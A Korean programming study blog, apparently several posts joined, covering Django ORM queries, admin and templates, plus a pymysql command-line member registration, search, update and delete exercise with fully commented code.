위 코드를 저장한 후 장고 쉘에 재 접속 후 데이터를 조회하면 제목으로 나오는 것을 확인할 수 있다.  

all()은 해당하는 객체 데이터에 전체 내용을 가져오는 것이다.

(2) 조건과 일치하는 모델 데이터 조회

filter, get 사용

• Question.objects.filter(id=1)
  • 조건에 해당하는 데이터를 모두 찾아서 QuerySet 형태로 리턴
• rs = Question.objects.fillter(id=100)
  • 조건을 만족하는 결과가 없는 경우 빈 QuerySet을 리턴
• Question.objects.get(id=1)
  • 조건에 해당하는 데이터 중 하나만 해당 객체 타입으로 리턴
• rs = Question.objects.get(id=100)
  • 조건을 만족하는 결과가 없는 경우 오류 발생

(3) 일부 내용을 포함하는 데이터 조회

__contains

• __contains를 사용하지 않으면 일치하는 것을 조회
• __contains를 사용하면 SQL의 LIKE 연산과 동일하게 동작

3) 모델 데이터 수정

• 수정 대상 조회 (get, filter)
• q.subject = 'What is pybo?'
  • 객체 필터의 데이터를 변경
• save 함수를 이용해서 DB에 반영

4) 모델 데이터 삭제

• delete 메서드를 호출하면 DB에도 즉시 반영 (save를 하지 않아도 됨)
• save와 delete는 DB에 반영하는 함수

8. 연결된 데이터 처리

1) Answer 모델 데이터 생성

종속관계가 있으면 참조하는 대상을 만들어서 매개변수로 넣어주면 된다.

2) Answer에 연결된 Question 조회

답변에는 그 답변에 대한 질문이 연결되어 있기 때문에 답변을 가져오면 연결된 질문도 가져올 수 있다.

3) Question에 연결된 Answer 조회

• 연결되어 있는 모델명_set 형식으로 참조

질문에 연결된 답변울 가져올 때는 all()을 사용한다.

질문과 답변은 1 : N의 관계이기 때문에 질문 하나에 여러 답변이 있을 수가 있기 때문이다. 

9. 장고 admin

1) 슈퍼 유저 생성

createsuperuser

2) admin 페이지 접속

 http://localhost:8000/admin/

3) Question, Answer 모델을 admin 페이지에 등록

장고 admin을 통해서 모델 관리 가능

(1) pybo\admin.py

from django.contrib import admin
from .models import Question

admin.site.register(Question)

위 파일에 코드를 저장 후 admin 페이지 리로드

(2) Questions 조회

(3) Add question

(4) 저장된 데이터 조회

4) 관리자 페이지에 검색 기능 추가

pybo\admin.py에 추가

from django.contrib import admin
from .models import Question

class QuestionAdmin(admin.ModelAdmin):
    search_fields = ['subject']

admin.site.register(Question, QuestionAdmin)

10. 사용자 화면 중 질문 목록 조회 기능 구현

pybo\views.py
question_list.html

1) Question 모델 데이터를 작성일자 역순으로 조회

pybo\viesw.py에 추가

from django.shortcuts import render
from .models import Question

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list' : question_list }

    return render(request, 'pybo/question_list.html', context)

여기서 html로 직접 구현한다면 코드가 너무 복잡해져 가독성이 떨어지게 된다.

데이터와 보여주는 형식을 분리시키면 가독성과 유지보수가 좋아진다.

2) 템플릿 생성

c:\python\projects\mysite\templates\pybo\question_list.html

{% if question_list %}
    <ul>
        {% for question in question_list %}
            <li><a href="/pybo/{{ question.id }}/">{{ question.subject }}</a></li>
        {% endfor %}
    </ul>
{% else %}
    <p>질문이 없습니다.</p>
{% endif %}

3) config\settings.py 파일에 템플릿 디렉터 추가

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [ BASE_DIR / 'templates' ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

• DIRS에 BASE_DIR / 'templates' 추가

기존에는 요청이 들어오면 view에서 그 문자열을 리턴했다. 

지금은 요정이 들어오면 view에서 Question 가지고 DB에 저장되어 있는 패지 해 온다.

이 패치해 온 데이터를 그냥 리턴할 수도 있지만 보기 좋게 만들려고 한다면 Template를 사용해야 한다.

가져온 데이터를 지정된 Template에 전달해 Template에서 형식에 맞게 정리해서 리턴한다.

Template 문법을 사용하려면 Template 디렉터리가 Settings에 등록을 해야 한다. 그다음 그 디렉터리 아래에 정리해 줄 HTML 파일을 만들어 줘야 한다.

이 HTML 파일은 그냥 HTML 파일이 아니고 HTML + 정리해 주는 문법이 결합되어 있는데 이것을 Template 언어라고 한다.

여기까지는 기본적인 흐름을 구현할 수 있을 정도로 공부했다고 할 수 있다.

보안이 우수하고 유지보수가 편리한 웹사이트를 신속하게 개발하도록 도움을 주는 파이썬 웹 프레임워크

Django는 다음과 같은 소프웨어를 개발하는데 도움을 준다.

1). Complete(완결성)

• "Batteries included"의 철학을 기반으로 개발자들이 개발하고 싶은 거의 모든 것을 개발하는데 도움을 줌

2) Versatile(다용도)

• 문서관리시스템과 Wiki, SNS, 뉴스에 이르기까지 다양한 종류의 웹 사이트를 빌드하는 데 사용
• 클라이언트측 프레임워크와 협업할 수 있음
• HTML, RSS 피드, JSON, XML 등 대부분의 형식으로 콘텐츠 전송할 수 있음

3) Secure(안전)

• 개발할 때 실수하기 쉽지만 고려해야 하는 보안 문제에 대해서 많은 도움을 줌
• 유저의 계정과 비밀번호를 관리하는 안전한 방법을 제공
• SQL 인젝션, XSS, CSRF, 클릭 하이재킹과 같은 보안 취약점을 보완할 방법 제공

4) Maintainable(유지보수)

• 유지보수가 쉽고 재사용하기 좋게끔 하는 디자인 원칙들과 패턴들을 이용하여 작성
• 불필요한 중복이 없고 많은 양의 코드를 줄임

5) Portable(포터블)

• 장고는 파이썬으로 작성되어 특정한 서버 플랫폼에 얽매이지 않음
• 다양한 운영체제에서 작동살 수 있음
• 웹 호스팅 공급자들에 의해서 지원되고 있음

2. 실습 환경 구성

1) 가상 환경 생성

• cmd에서 python폴더 아래에 가상 환경을 만들어 준다.

2) 가상 환경 진입

• python\mysite\Scripts\activate

cmd에서 pip list를 입력하면 이전에 설치한 패키지들이 있다. 하지만 가상 환경에서는 아무것도 나오지 않는 것을 볼 수 있다. cmd와는 다른 환경이라는 것을 알 수 있는 것이다.

3) 가상 환경 벗어나기

• deactivate

3. 장고 프로젝트 생성

1) 프로젝트 디렉터리 생성

2) 장고 패키지 설치

• c:\python\mysite\Scripts\activate로 가상 환경 진입 후 장고 패키지 설치
• pip install django==3.1.3

설치 완료 확인 후 pip list로 설치가 되었는지 확인해 보면 된다.

3) 장고 프로젝트 생성

python 3.11 버전에서 기본적으로 포함되어 있는 setuuptools인데 3.12 버전에서 삭제되어 설치한다.

• 현재 디렉터리를 프로젝트 디렉터리로 만들라는 의미

code . 을 입력해 VS Code를 실행하면 해당 폴더로 VS Code가 켜진다.

출력 예시

==========================
메뉴
--------------------------
Q : 종료         ⇒ 프로그램을 종료
I : 등록           ⇒ 등록 화면으로 이동
S : 검색          ⇒ 검색 화면으로 이동
==========================
메뉴를 선택하세요 >>>

==========================
회원 등록
--------------------------
이름 : 홍길동
나이 : 23
이메일 : hong@test.com
==========================
Y : 등록 / N : 취소

Y → members 테이블에 입력한 내용을 저장 → 등록했습니다. 출력 후 메뉴 화면으로 이동
N → 메뉴 화면으로 이동

==========================
회원 검색
--------------------------
이름 : 길동
==========================
Y : 검색 / N : 취소

Y → members 테이블에 like 검색 → 검색 결과 화면으로 이동
N → 메뉴 화면으로 이동

==========================
회원 검색 결과 (OO건)
--------------------------
1 : 홍길동                     ⇐ 검색 결과를 회원아이디 : 회원이름 형식으로 나열
2 : 고길동                         검색 결과가 없는 경우 "일치하는 결과 없음" 출력
3 : 신길동
==========================
번호 : 상세 조회 / N : 취소

번호(회원 아이디) → 회원 상세 조회 화면으로 이동
N → 메뉴 화면으로 이동

==========================
회원 상세 조회
--------------------------
아이디 : 1
이름 : 홍길동
나이 : 23
이메일 : hong@test.com
==========================
U : 수정 D : 삭제 / Y : 메뉴로 이동

D → 해당 회원 삭제 후 "삭제했습니다" 메시지를 출력하고 메뉴 화면으로 이동
U → 수정 화면으로 이동
N → 메뉴 화면으로 이동

==========================
회원 수정
--------------------------
아이디 : 1                                ⇐ 회원 정보를 보여주고,
이름 : 홍길동
나이 : 23
이메일 : hong@test.com
==========================
나이 : 43
이메일 : gildong@test.com
수정할까요? (Y : 수정 / N : 메뉴로 이동)

Y → 나이와 이메일을 입력받아서 수정 후 "수정했습니다." 메시지를 출력하고
메뉴 화면으로 이동
N → 메뉴 화면으로 이동
   
회원 등록 및 수정 시 이름, 나이, 이메일의 형식을 정규식을 이용해서 검증 후 등록, 수정 처리해야 함

위 출력 예시처럼 구현되는 프로그램을 작성하는 실습이다. 

이 프로그램을 시작했을 때는 막막했다. 어떻게 작성해야 하는지 몰랐지만 하나하나 코드가 지나가는 순서대로 짚어보면서 이해하려고 노력했다. 내 방식대로 최대한 이해하는데 1.5일 정도 걸린 것 같다.

실습은 코드로 대체한다.

2. 실습 코드

import pymysql
import re

def print_double_line() :
    print(f'{'=' * 26}')

def print_single_line() :
    print(f"{'-' * 26}")

def print_title(title) :
    print()
    print_double_line()
    print(title)
    print_single_line()

def ans_check(message, user_input) :
    while True:
        i = input(message).upper()
        if i in user_input :
            return i
        else:
            print("잘못된 입력입니다. 확인 후 다시 입력해 주세요.")

def print_main_menu():
    print_title('메뉴')
    print('I : 회원 등록')
    print('S : 회원 검색')
    print('Q : 종료')
    print_double_line()

def main() :
    print_main_menu()

    menu = ans_check('메뉴를 입력하세요 : ', ("I", "S", "Q"))
    if menu == 'I' :
        add_member()
    elif menu == 'S' :
        search_member()
    else :
        print("종료합니다.")

def add_name_check(name):
    return bool(re.match('^[가-힣]+$', name))

def add_age_check(age) :
    return bool(re.match(r'^([1-9]|[1-9][0-9]|1[0-4][0-9]|150)$', age))

def add_email_check(email) :
    return bool(re.match(r'^[a-zA-Z0-9_]+@[a-zA-Z0-9]+\.[a-zA-Z]{2,}$', email))

def input_check(message, pattern_name) :    
    while True :
        user_input = input(message)
        if pattern_name(user_input) :
            return user_input
        else :
            print("입력이 잘못되었습니다. 다시 입력하세요")


def add_member():
    print_title('회원 등록')

    name = input_check("이름 : ", add_name_check)
    age = input_check("나이 : ", add_age_check)
    email = input_check('이메일 : ', add_email_check)

    print_single_line()

    YN = ans_check('등록하시겠습니까? (Y : 등록 / N : 취소) :', ('Y', "N"))
    if YN == 'Y' :
        query = "INSERT INTO members (member_name, member_age, member_email) values (%s, %s, %s)"

        try:
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                                db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

                curr = conn.cursor()
                count = curr.execute(query, (name, age, email))
                if count == 1:
                    print("회원 정보를 정상적으로 등록했습니다.")
                    conn.commit()
                    yn = ans_check('추가 등록하시겠습니까? (Y : 등록 / N : 메인 메뉴) :', ('Y', "N"))
                    if yn == 'Y' :
                        add_member()
                    else :
                        main()
                else:
                    print("회원 정보를 등록하는데 실패했습니다.")
                    conn.rollback()
                    main()
        except pymysql.MySQLError as e:
            print(e) 
    else :
        YN =ans_check("회원 등록을 취소했습니다.\n다시 등록하시겠습니까? (Y : 등록 / N : 메인 메뉴) : ", ('Y', 'N'))
        if YN == 'Y' :
            add_member()
        else :
            print("회원 등록을 취소합니다.")
            main()


def search_member() :
    print_title("회원 검색")
    name = input_check("이름 : ", add_name_check)
    print_double_line()

    YN = ans_check('검색하시겠습니까? (Y : 검색 / N : 취소) : ', ('Y', "N"))
    if YN == 'Y' :
        query = "SELECT * FROM members WHERE member_name like %s"
        try:
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                                db="sampledb", cursorclass=pymysql.cursors.DictCursor, autocommit=True) as conn:


                curr = conn.cursor()
                count = curr.execute(query, ('%'+name+'%',))
                results = curr.fetchall()
                print_title(f'회원 검색 결과 (총 {count}건)')

                if count == 0 :
                    print("일치하는 결과가 없습니다. 다시 검색해 주세요.")
                    search_member()
                else :
                    id_nums = []
                    for result in results :
                        id_nums.append(str(result['member_id']))
                        print(f"{result['member_id']} : {result['member_name']}")
                    print_single_line()
                    id_nums.append('N')            
                    detail_member(id_nums)               
        except pymysql.MySQLError as e:
            print(e) 
    else :
        YN =ans_check("회원 검색을 취소했습니다.\n다시 검색하시겠습니까? (Y : 검색 / N : 메인 메뉴) : ", ('Y', 'N'))
        if YN == 'Y' :
            search_member()
        else :
            print("회원 검색을 취소합니다.")
            main()


def detail_member(id_nums) :
    id_num = ans_check("회원 상세 조회 하시겠습니까? (번호 : 상세 조회 / N : 메인 메뉴) : ", id_nums)
    if id_num == 'N' :
        print('상세 조회를 취소합니다.')
        main()
    else :
        print_title('회원 상세 조회')
        query = "SELECT * FROM members WHERE member_id = %s"
        try:
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                                db="sampledb", cursorclass=pymysql.cursors.DictCursor, autocommit=True) as conn:

                curr = conn.cursor()
                curr.execute(query, (id_num,))
                member = curr.fetchone()

                print(f"ID : {member['member_id']}")
                print(f"이름 : {member['member_name']}")
                print(f"나이 : {member['member_age']}")
                print(f"이메일 : {member['member_email']}")

                print_double_line()

                UDN = ans_check('어떤 작업을 하시겠습니까? (U : 수정 / D : 삭제 / N : 메인 메뉴) : ', 
                                ('U', 'D','N'))
                if UDN == 'U' :
                    update_member(member['member_id'])
                elif UDN == 'D' :
                    delete_member(member['member_id'])
                else :
                    main()
        except pymysql.MySQLError as e:
            print(e)


def update_member(id) :
    print_title('회원 수정')
    query = "SELECT * FROM members WHERE member_id = %s"
    try:
        with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                            db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

            curr = conn.cursor()
            curr.execute(query, (id,))
            member = curr.fetchone()

            print(f"ID : {member['member_id']}")
            print(f"이름 : {member['member_name']}")
            print(f"나이 : {member['member_age']}")
            print(f"이메일 : {member['member_email']}")
            print_double_line()

            age = input_check("나이 : ", add_age_check)
            email = input_check('이메일 : ', add_email_check)
            YN = ans_check("수정할까요? (Y : 수정 / N : 취소) : ", ("Y", "N"))

            if YN == 'N' :
                YSN = ans_check(f"{member['member_name']} 수정을 취소했습니다.\n"
                               f"{member['member_name']} 다시 수정하시려면 Y, 다른 검색 하시려면 S를 입력하세요."
                               " (Y : 수정 / S : 검색 / N : 메인 메뉴) : ",
                               ("Y", 'S', "N"))
                if YSN == "Y" :
                    update_member(id)
                elif YSN == 'S' :
                    print("수정 취소 합니다.")
                    search_member()
                else :
                    print("수정 취소 합니다.")
                    main()
            else :
                query = "UPDATE members SET member_age = %s, member_email = %s WHERE member_id = %s"
                count = curr.execute(query, (age, email, id))
                if count == 1 :
                    print("회원 정보를 정상적으로 수정했습니다.")
                    conn.commit()
                    main()
                else:
                    print("회원 정보를 등록하는데 실패했습니다.")
                    conn.rollback()
                    main()
    except pymysql.MySQLError as e:
            print(e)


def delete_member(id) :
    YN = ans_check("회원 정보를 삭제하시겠습니까? (Y : 삭제 / N : 취소) : ", ('Y', 'N'))
    if YN== 'N' :
        print("회원 정보 삭제를 취소했습니다.")
        main()
    else :
        query = 'DELETE FROM members WHERE member_id = %s'
        try:
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                            db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

                curr = conn.cursor()
                count = curr.execute(query, (id,))

                if count == 1 :
                    print("회원 정보를 정상적으로 삭제했습니다.")
                    conn.commit()
                    main()
                else:
                    print("회원 정보를 삭제하는데 실패했습니다.")
                    conn.rollback()
                    main()
        except pymysql.MySQLError as e:
            print(e)

if __name__ == "__main__":
    main()

3. 실습 코드 설명

실습 코드 설명은 주석문이 많아서 가돈성이 떨어지지만 이해한 만큼 최대한 자세히 설명하려고 노력했다.

import pymysql                          # pymysql 모듈을 사용하기 위한 import
import re                               # re 모듈을 사용하기 위한 import

def print_double_line() :               # '='을 26번 출력하는 함수
    print(f'{'=' * 26}')

def print_single_line() :               # '-'을 26번 출력하는 함수
    print(f"{'-' * 26}")

def print_title(title) :                # 메뉴의 타이틀을 출력하는 함수, 매개변수로 title을 받음
    print()                             # 이전 작업과 분리하기 위한 개행
    print_double_line()
    print(title)                        # 받은 매개변수 출력
    print_single_line()

def ans_check(message, user_input) :    # 사용자의 answer를 체크하는 함수, 매개 변수로 message와 user_input을 받음
    while True:                         # while 무한 루프 
        i = input(message).upper()      # 받은 메시지는 출력하고, 사용자 입력을 받아 대문자로 변환 후 i에 저장
        if i in user_input :            # 사용자가 입력한 i에 user_input 튜플에 지정된 유효한 옵션 중 하나인지 확인
            return i                    # 옵션에 있는 입력 값이면 i를 반환
        else:                           # 그렇지 않으면 print를 출력 후 while문 다시 실행
            print("잘못된 입력입니다. 확인 후 다시 입력해 주세요.")

def print_main_menu():                  # 메인 메뉴를 출력하는 함수
    print_title('메뉴')                 # print_title() 함수에 매개변수로 '메뉴'를 넘김
    print('I : 회원 등록')
    print('S : 회원 검색')
    print('Q : 종료')
    print_double_line()

def main() :                            # 이 스크립트의 메인 함수
    print_main_menu()                   # 메인 메뉴 출력

    # menu 변수에 ans_check의 값을 저장 message를 주고 사용자의 입력은 "I", "S", "Q"로 제한하는 옵션을 붙임 
    menu = ans_check('메뉴를 입력하세요 : ', ("I", "S", "Q"))   
    if menu == 'I' :            # menu의 값이 I라면
        add_member()            # add_member() 함수 실행
    elif menu == 'S' :          # menu의 값이 S라면
        search_member()         # search_member() 함수 실행
    else :                      # 둘 다 아니면 종료 이때 elif를 사용해도 되지만 if 문의 연산을 한 번 더 하기 때문에
        print("종료합니다.")    # 효율적이지 못해 eles를 사용

def add_name_check(name):                   
    return bool(re.match('^[가-힣]+$', name))   
    # 사용자가 입력한 name의 문자열이 처음부터 끝까지 한국어 문자 범위와 하나 이상의 문자가 
    # 이 정규 표현식 패턴과 일치하는지 확인 후 True 또는 False 반환하는 함수
    # 이렇게 해야 특수문자 및 숫자도 검사 됨
    # "[가-힣]+", "^[가-힣]+"으로 했을 때 "가!"를 입력하면 범위 중 한 개 이상 매치 되므로 오류 없이 통과됨
    # "[가-힣]+$", 이렇게만 써도 특수문자 및 숫자도 검사되지만, ^을 써줌으로써 처음부터 끝까지라는 범위가 생김

def add_age_check(age) :           
    return bool(re.match(r'^([1-9]|[1-9][0-9]|1[0-4][0-9]|150)$', age))     
    # 사용자가 입력한 age의 문자열이 처음부터 끝까지 1에서 150까지 범위와 일치하는지
    # 확인 후 True 또는 False 반환하는 함수


def add_email_check(email) :        
    return bool(re.match(r'^[a-zA-Z0-9_-]+@[a-zA-Z0-9]+\.[a-zA-Z]{2,}$', email)) 
    # 사용자가 입력한 eamil의 문자열이 처음부터 끝까지 이 정규 표현식 패턴과 일치하는지
    # 확인 후 True 또는 False 반환하는 함수
    # [a-zA-Z0-9_-] a-z 영어 소문자, A-Z 영어 대문자, 숫자, 특수문자 "_", "-"를 포함 
    # 아이디 부분에 다른 특수문자도 포함하고 싶다면 특수문자 "-" 뒤에 추가 입력하면 됨 *(네이버 아이디 기준을 따름)
    # "@"는 아이디와 도메인 네임 중간에 필수 포함
    # [a-zA-Z0-9] a-z 영어 소문자, A-Z 영어 대문자, 숫자
    # "\." 이스케이프 문자로 .을 표현 도네임 네임과 최상위 도메인을 구분을 위해 필수 포함
    # [a-zA-Z]{2,} a-z 영어 소문자, A-Z 영어 대문자


def input_check(message, pattern_name) :   
    # add_member()에서 사용자 입력값을 검사하는 함수, 정규 표현식 체크 함수의 이름을 매개변수로 받음   

    while True :                      # while 무한 루프
        user_input = input(message)   # message를 보여주고 사용자 입력을 user_input에 저장
        if pattern_name(user_input) : # 받아온 정규 표현식 함수 이름을 넣고 사용자 입력을 매개변수로 넘김
            return user_input         # 각 정규 표현식 체크에서 True가 반환되면 if문이 실행 돼서 uesr_input을 반환
        else :                        # 정규 표현식 패턴 체크에서 False가 반환되면 else문 실행
            print("입력이 잘못되었습니다. 다시 입력하세요")    # 문자열 출력 후 while문 다시 실행


def add_member():               # 회원 등록 함수 
    print_title('회원 등록')    # print_title() 함수에 매개변수로 '회원 등록'을 넘김

    name = input_check("이름 : ", add_name_check) 
    # 사용자가 입력한 값을 add_name_check() 함수에서 True를 반환하면 name에 저장 

    age = input_check("나이 : ", add_age_check)
    # 사용자가 입력한 값을 add_age_check() 함수에서 True를 반환하면 age에 저장 

    email = input_check('이메일 : ', add_email_check)
    # 사용자가 입력한 값을 add_email_check() 함수에서 True를 반환하면 email에 저장 

    print_single_line()

    YN = ans_check('등록하시겠습니까? (Y : 등록 / N : 취소) :', ('Y', "N"))
    # 사용자가 입력한 값을 ans_check에서 확인 후 YN에 Y 또는 N 저장

    if YN == 'Y' :  # YN이 Y라면
        query = "INSERT INTO members (member_name, member_age, member_email) VALUES (%s, %s, %s)"
        # query에 SQL문을 저장 members 테이블에 각 컬럼들에 값을 매개변수로 받아 INSERT 함

        try:        # 오류를 처리하기 위한 try - except 구문
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                                db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:
                # with문으로 pymysql을 실행, with문으로 실행함으로써 with문를 벗어나는 순간 자동으로 close 함

                curr = conn.cursor()    # 커서를 생성해서 입력 쿼리를 실행
                count = curr.execute(query, (name, age, email))
                # 쿼리를 실행할 때 위 정규 표현식 체크가 끝난 변수들을 매개변수로 넘김 

                if count == 1:      # count가 1이면 if문 실행 SQL에 정상적으로 데이터 입력이 되면 실행됨
                    print("회원 정보를 정상적으로 등록했습니다.")
                    conn.commit()   # 현재 트랜잭션을 커밋, 변경 사항을 영구적으로 적용
                    yn = ans_check('추가 등록하시겠습니까? (Y : 등록 / N : 메인 메뉴) :', ('Y', "N"))
                    # 메인 메뉴로 바로 가지 않고 추가 등록을 물어보기 위한 사용자 입력 함수
                    # ans_check에서 입력 체크

                    if yn == 'Y' :      
                        add_member()    # add_member() 함수를 다시 불러 추가 등록함
                    else :              
                        main()          
                else:                   # count가 1이 아니면 else 실행
                    print("회원 정보를 등록하는데 실패했습니다.")
                    conn.rollback()     # 트랜잭션 커밋에 실패하면 변경 사항이 롤백되어 데이터베이스가 
                    main()              # 트랜잭션 시작 전 상태로 되돌아간 후 메인 메뉴로 이동
        except pymysql.MySQLError as e:     # 발생 오류와 오류 변수까지 포함한 except문
            print(e)                        # 오류 내용을 출력
    else :             
        YN =ans_check("회원 등록을 취소했습니다.\n다시 등록하시겠습니까? (Y : 등록 / N : 메인 메뉴) : ", ('Y', 'N'))
        # 회원 등록 추소 후 메인 메인 메뉴로 바로 가지 않고 다시 등록을 물어보기 위한 사용자 입력 함수
        # ans_check 입력 체크
        if YN == 'Y' :      
            add_member()    # add_member() 함수를 다시 불러 처음부터 다시 등록함
        else :              
            print("회원 등록을 취소합니다.")    
            main()                              # 메인 메뉴 이동


def search_member() :           # 회원 검색 함수
    print_title("회원 검색")    # print_title() 함수에 매개변수로 '회원 검색'을 넘김
    name = input_check("이름 : ", add_name_check)     # 사용자 입력 정규 표현식 체크
    print_double_line()

    YN = ans_check('검색하시겠습니까? (Y : 검색 / N : 취소) : ', ('Y', "N"))    # 검색을 위한 사용자 answer 체크
    if YN == 'Y' :     
        query = "SELECT * FROM members WHERE member_name like %s"
        # SELECT문으로 members 테이블 member_name의 모든 열 중 사용자 입력값을 포함한 행을 반환

        try:           
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                                db="sampledb", cursorclass=pymysql.cursors.DictCursor, autocommit=True) as conn:

                curr = conn.cursor()
                count = curr.execute(query, ('%'+name+'%',))
                results = curr.fetchall()   # 커서로부터 모든 행(레코드)을 반환
                print_title(f'회원 검색 결과 (총 {count}건)') # print_title() 함수에 매개변수로 문자열을 넘김

                if count == 0 :
                    print("일치하는 결과가 없습니다. 다시 검색해 주세요.")
                    search_member()             # 다시 검색을 위해 search_member() 함수 부름
                else :
                    id_nums = []                # id 번호를 저장하기 위한 리스트
                    for result in results :     # 검색한 모든 결과가 들어있는 results에서 하나씩 result에 넣음
                        id_nums.append(str(result['member_id']))    # id 번호를 id_nums에 str로 추가
                        print(f"{result['member_id']} : {result['member_name']}")   
                        # 검색한 결과를 ID : 이름으로 출력
                    print_single_line()
                    id_nums.append('N')     # id_num 리스트에는 id 번호만 있는데 N이 없을 경우          
                    detail_member(id_nums)  # detail_member()에서 N을 사용할 수 없어 
                                            # 잘못된 입력이라고 버그 남 그렇기 때문에 N을 추가  (!!중요!!)
                                            # id_nums에는 (예 : [1, 12, 24, N]) 마지막에 N이 같이 저장됨              
        except pymysql.MySQLError as e:     
            print(e)                        
    else :
        YN =ans_check("회원 검색을 취소했습니다.\n다시 검색하시겠습니까? (Y : 검색 / N : 메인 메뉴) : ", ('Y', 'N'))
        # 메인 메뉴로 바로가지 않고 다시 검색 질문
        if YN == 'Y' :
            search_member()     # 다시 검색을 원하면 search_member() 실행
        else :
            print("회원 검색을 취소합니다.")
            main()


def detail_member(id_nums) :    # 회원 상세 조회 함수
    id_num = ans_check("회원 상세 조회 하시겠습니까? (번호 : 상세 조회 / N : 메인 메뉴) : ", id_nums)
    if id_num == 'N' :
        print('상세 조회를 취소합니다.')
        main()
    else :
        print_title('회원 상세 조회')
        query = "SELECT * FROM members WHERE member_id = %s"
        # 여기서 정확한 한 명의 회원 상세 조회이기 때문에 like 아니고 = 으로 함 
        try:
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                                db="sampledb", cursorclass=pymysql.cursors.DictCursor, autocommit=True) as conn:

                curr = conn.cursor()
                curr.execute(query, (id_num,))
                member = curr.fetchone()    # 커서로부터 하나의 행(레코드)을 반환, 한 사람 것만 가져오면 됨

                print(f"ID : {member['member_id']}")
                print(f"이름 : {member['member_name']}")
                print(f"나이 : {member['member_age']}")
                print(f"이메일 : {member['member_email']}")

                print_double_line()

                UDN = ans_check('어떤 작업을 하시겠습니까? (U : 수정 / D : 삭제 / N : 메인 메뉴) : ', 
                                ('U', 'D','N'))     # 다음 작업을 위한 사용자 answer 체크
                if UDN == 'U' :
                    update_member(member['member_id'])  # 회원 수정 함수로 이동
                elif UDN == 'D' :
                    delete_member(member['member_id'])  # 회원 삭제 함수로 이동
                else :
                    main()

        except pymysql.MySQLError as e:
            print(e)


def update_member(id) :         # 회원 수정 함수
    print_title('회원 수정')    # print_title() 함수
    query = "SELECT * FROM members WHERE member_id = %s"
    # 위 상세 조회와 같이 하나만 가져오면 되기 때문에 "="
    try:
        with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                            db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

            curr = conn.cursor()
            curr.execute(query, (id,))
            member = curr.fetchone()    # 커서로부터 하나의 행(레코드)을 반환, 한 사람 것만 가져오면 됨

            print(f"ID : {member['member_id']}")
            print(f"이름 : {member['member_name']}")
            print(f"나이 : {member['member_age']}")
            print(f"이메일 : {member['member_email']}")
            print_double_line()

            age = input_check("나이 : ", add_age_check)
            email = input_check('이메일 : ', add_email_check)
            YN = ans_check("수정할까요? (Y : 수정 / N : 취소) : ", ("Y", "N"))

            if YN == 'N' :
                YSN = ans_check(f"{member['member_name']} 수정을 취소했습니다.\n"
                               f"{member['member_name']} 다시 수정하시려면 Y, 다른 검색 하시려면 S를 입력하세요."
                               " (Y : 수정 / S : 검색 / N : 메인 메뉴) : ",
                               ("Y", 'S', "N"))
                # 방금 수정 중인 사람의 수정을 다시 하기 또는 다른 사람 검색을 위한 변수
                if YSN == "Y" :
                    update_member(id)   
                    # 매개변수를 id로 받기 때문에 방금 수정 작업하던 데이터만 수정 가능 
                elif YSN == 'S' :
                    print("수정 취소 합니다.")
                    search_member()     
                    # 위의 문제로 다른 데이터를 수정하기 위해서는 처음부터 다시 검색해야 함
                else :
                    print("수정 취소 합니다.")
                    main()
            else :
                query = "UPDATE members SET member_age = %s, member_email = %s WHERE member_id = %s"
                # members 테이블에 사용자가 입력한 member_id에서 
                # member_age와 member_email을 사용자 입력 값으로 변경 

                count = curr.execute(query, (age, email, id)) 
                # 쿼리 실행 시 사용자 입력 값을 매개변수로 넘김

                if count == 1 :
                    print("회원 정보를 정상적으로 수정했습니다.")
                    conn.commit()
                    main()
                else:
                    print("회원 정보를 등록하는데 실패했습니다.")
                    conn.rollback()
                    main()
    except pymysql.MySQLError as e:
            print(e)


def delete_member(id) :     #회원 정보 삭제 함수, 매개변수 id 받음
    YN = ans_check("회원 정보를 삭제하시겠습니까? (Y : 삭제 / N : 취소) : ", ('Y', 'N'))
    if YN== 'N' :
        print("회원 정보 삭제를 취소했습니다.")
        main()
    else :
        query = 'DELETE FROM members WHERE member_id = %s'
        # members 테이블에 사용자가 입력한 member_id를 삭제
        try:
            with pymysql.connect(host="localhost", port=3306, user="springboot", passwd="qwert12345",
                            db="sampledb", cursorclass=pymysql.cursors.DictCursor) as conn:

                curr = conn.cursor()
                count = curr.execute(query, (id,))

                if count == 1 :
                    print("회원 정보를 정상적으로 삭제했습니다.")
                    conn.commit()
                    main()
                else:
                    print("회원 정보를 삭제하는데 실패했습니다.")
                    conn.rollback()
                    main()
        except pymysql.MySQLError as e:
            print(e)

if __name__ == "__main__":  
    # 직접 이 파일을 실행했을 때 True가 돼 if문 실행 
    # 인터프리터나 다른 파일에서 이 모듈을 불러 사용할 때는 False가 돼 if문 실행 안 함
    main()

데이터베이스와 연동을 하기 위해서는  데이터베이스와 연결을 해야 한다. 이때 connect() 메서드를 사용한다.

연결이 되면 연결 객체가 만들어지는데 객체 안에는 커서라는 게 있다. 커서란 애플리캐이션 하고 데이터베이스 쪽에  서로 SQL 문을 전달하고 데이터베이스에서 그 SQL문을 실행한 결과를 받아오는 역할을 한다. SQL 문과 실행결과를 실어 나르는 객체다.

SQL 문을 실행을 전달할 때는 커서의 execute 함수를 사용한다.

commit()은 앞에서 했던 작업들을 DB에 반영되도록 하는 함수

close() 연결을 닫아 준다.

2. SQL 유형

• DML은 저장되어 있는 데이터를 조작
